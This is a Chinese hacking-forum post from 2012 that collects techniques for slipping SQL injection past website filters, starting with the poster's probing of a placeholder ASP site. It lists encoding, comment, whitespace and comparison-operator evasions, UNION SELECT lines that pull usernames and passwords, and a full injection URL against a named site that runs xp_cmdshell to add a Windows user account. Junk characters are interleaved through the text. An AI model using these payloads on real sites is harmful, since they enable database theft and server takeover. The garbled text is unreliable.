找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2050|回复: 0
打印 上一主题 下一主题

饶过防注入系统方法总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:47:46 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
路过这个网站,检测了一下.
; j$ b9 a8 q1 \/ dhttp://www.xxx.cn/Article.asp?ID=117 and 1=1
" B) ^& {) Q4 A. h直接返回主页
# t! w3 u8 D, o. l6 Bhttp://www.xxx.cn/Article.asp?ID=117 or 1=1
) t  x( V+ |- B! b$ {3 z8 _$ S" P4 F7 r直接返回主页
$ V4 t  E$ }1 zhttp://www.xxx.cn/Article.asp?ID=117 or( k$ y: d1 D" x) {; f, D! p" H0 L. P5 L
没有返回主页 没有过滤or
8 G7 e4 X4 Z- Z1 b* W! fhttp://www.xxx.cn/Article.asp?ID=117 and
* o* W$ l/ v, f& c$ V7 v, y, k" k直接返回主页 看来过滤了and
+ O5 s3 h* d* }: ^) U! l, Vhttp://www.xxx.cn/Article.asp?ID=117 or 1- D8 D% K7 F) j  x9 t
没有返回主页 即没有过滤or 也没有过滤12 y9 |4 Q1 A: J1 x9 ?. Z  M
http://www.xxx.cn/Article.asp?ID=117 or 1=1
" [" \- }1 ~/ C8 i直接返回主页 很明显过滤了等号
3 A9 v) x( u0 W; d, ^; zor的特性是与and相反的.
  x( v* v" Z% O$ x/ Wor 1=1 爆错 或与原页面不同
0 M4 C% k3 P0 C( N3 Zor 1=2 原页面相同
/ s$ `  |. R) ]! h* W, ^这样就是一个注入点
) {0 p" a$ N) o" o. D3 Y但他过滤了=号 我就用><号代替=号吧!# H6 z# |. b+ }; h2 f
or 1<2 很明显是正确的,所以应该与原页面不同
4 t( O! f0 D7 w  m/ U& P) F' V- _or 1>2 很明显是错误的,所以应该与原页面相同  ^/ Y) c; n$ I; f7 f
然后看看有没有过滤其他的查询语句,比如select.$ N1 s  R& |  G
http://www.xxx.cn/Article.asp?ID=117 select/ x6 i" i( @0 Z4 P8 y9 M
直接返回主页3 e' T- K0 L2 Y) \
又迷茫了..+ E9 F: V! V, D$ O

+ S: Y+ {$ ]1 o. e$ X$ {0 Z
( G, x1 V6 I1 m3 P; r  x! W6 i$ Tcookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗, z) @+ f% O9 S$ c
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
" {+ ]. s# G8 Q( s================================================. J/ l' z1 T+ X
以下是转贴:- n& C5 w2 l& E; t8 m

: d" P  \5 _1 e9 c" {突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… ; Z$ Z( F( O" Q: k. W
经过我的收集,大部分的防注入程序都过滤了以下关键字:
7 ?# X8 |; Z5 S6 Fand | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = % p: W- L5 E- R' D$ `, I6 ~% t
而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
2 ]" U5 U; W7 M4 J* k: F9 m2 p5 S0 n对于关键字的过滤,以下是我收集的以及我个人的一些想法。 0 f6 b" M6 P. ]- ^2 N( k% q
1、运用编码技术绕过
( k, T& E# v1 S4 f5 K8 }如URLEncode编码,ASCII编码绕过。例如or 1=1即
, G- E! V/ S# I: ~%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
8 f; ^0 H9 N, i0 j7 |, e# \% }& ?+ a$ U, I, A* ?
2、通过空格绕过 & \# V" y3 S1 G, R9 }
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
1 p, ^1 J' b7 I( [3 x' Sor’ swords’ =‘swords’ * T- f: P5 T0 k
,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。
9 e' T5 H$ U, M! [7 I' b3、运用字符串判断代替 ; v, |* J5 y. r) S4 ?2 R% ~
用经典的or 1=1判断绕过,如
) m, |' n8 Z% a% L2 Cor ’swords’ =’swords’ ! U* }+ |$ g2 G  X7 m" Q- E
,这个方法就是网上在讨论的。   \! p  r: P- ]! z0 b+ H
4、通过类型转换修饰符N绕过
" ?: k' [" O( l2 N! A3 @) s1 X可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。 $ }, {2 Z3 ~3 s& E5 N
5、通过+号拆解字符串绕过
. q  s3 ?, R! Z7 r效果值得考证,但毕竟是一种方法。如
7 F1 V# p+ G" c8 tor ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) 4 A# T: a$ Q& s5 v. E

' ]* t+ a5 S$ ?$ h6 o: j* j# t/ t1 i6、通过LIKE绕过 ( D0 ?$ R2 S0 {0 a5 }0 E
以前怎么就没想到呢?如or
+ H8 U% J7 e& T2 A1 ~’swords’ LIKE ’sw’ 1 L; p5 D; H& u1 C
!!!显然可以很轻松的绕过
; g) H! X) x7 Z$ D  g“=”“>” & I1 c4 Z/ ]* t! M
的限制……
; F% C$ n* U* q# o) @7、通过IN绕过
% t1 n" R; S6 }  P& P; ]5 B与上面的LIKE的思路差不多,如
: V+ _- x" S; Sor ’swords’ IN (’swords’)
$ W# E3 x, c* U; C2 z
4 u8 I2 i/ o$ W+ X  X8、通过BETWEEN绕过 " w9 ^% Q' J* u  g: V; n9 q3 D

: [, F8 ^+ y  q2 l7 vor ’swords’ BETWEEN ’rw’ AND ’tw’ , x& _* [; E* ~4 L3 M% d

6 Q; k/ F/ f5 m/ ~/ y0 e9、通过>或者<绕过 % Q! t, A7 b' ?% ?
or ’swords’ > ’sw’ # q" C. z3 I/ ^: n" C& {
or ’swords’ < ’tw’ ' G% d3 t' s/ o5 m' n
or 1<3
  @: J6 q2 e% z4 m……
1 \) ]/ G5 r+ v7 Q, p10、运用注释语句绕过   S/ U& I6 q2 E% w0 `' Y6 p# x
用/**/代替空格,如: 6 b( m* _$ l7 w5 M3 y* L. V4 e% H- F
UNION /**/ Select /**/user,pwd,from tbluser + x( y$ F1 j, j% }& E
  c1 f6 ?5 E5 a4 `/ P4 a
用/**/分割敏感词,如:
) U/ {  }0 f" oU/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
* q; ?0 x9 i- |& F* c8 o* c/ g. d  u! [
11、用HEX绕过,一般的IDS都无法检测出来 6 ?$ r4 D4 U6 v% r/ h
0x730079007300610064006D0069006E00 =hex(sysadmin) $ L: ]; n! Y' M* I+ F% w! z
0x640062005F006F0077006E0065007200 =hex(db_owner) $ e# B  u' d; i9 C
另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: / e# g1 v0 P. M
  declare @a sysname , s0 u) v2 N* A) b* E
  select @a= 9 q. f' G. c' e7 I! T
  exec master.dbo.xp_cmdshell @a . ^0 e, s0 p0 z* x
效果
# z: ^" n, ]; k6 \7 Shttp://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];--
$ T# g0 x! w# ?! `2 _7 S
" F, H" p7 t6 V* B: k其中的
) h6 N* `" E7 P7 B0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 , Z* L! i/ {1 H; |) a# n
就是
. X4 n6 G2 l7 `& Z4 C$ o& N; h“net user angel pass /add”* a) q' g9 h! r1 F# O  \3 c; {

5 r* V1 k- O0 t3 _一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。
* F: G" |: S4 [引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。% \# r# T0 O/ j
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似
* W: j) ^2 J9 {1 g/ ]Copy code1 I# |; u& F3 ?
select * from table exec xp_cmdshell'xxxxxxxxxx', @  l% ]% k+ r4 Z' f* r% B! b

. s/ Q- v* V# j) e9 U) L
# d( }0 A6 [8 @: e5 u- Z0 x7 Fselect * from table/**/exec xp_cmdshell'xxxxxxxxxx'
$ c# v  n& Q6 I6 ]8 D; \/ J. o2 F  a' V9 ~' D: x! r. Y

5 z2 V9 W5 I1 o! I: T8 g! Nselect * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'
0 d: q9 D% n4 C5 C7 Q, D) r& {, N0 V/ y

1 Z  ]* Q5 A. Z2 g+ H/ V2 ]) }9 ^select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'
) `& L, X* Y* H5 @9 h. @( I: w1 U
1 i/ ]' z+ I# [, r* v的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?/ L( @. i  _- `/ V+ b

2 U! s- W& H# K这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了4 y8 Z. V/ R- ^  P$ E
可能大家早就知道了,不管怎么说,发在这里吧!
) B4 r( s& C+ d2 C/ P( ]4 E( O4 J: Y- B8 f
最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。$ a+ P* |0 ?% b6 D8 ^8 s

8 H; w8 c; A5 I" X' R4 K9 c- C' D5 A* k2 [2 b% R
; W) ?3 L. s+ l' N& k
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,
& \: N, g4 p% Z9 U0 F; M比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?
( R+ L, p! Y3 D. z# `0 w
( o6 K0 r& Y& [" g, Q5 K  f" d/ y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表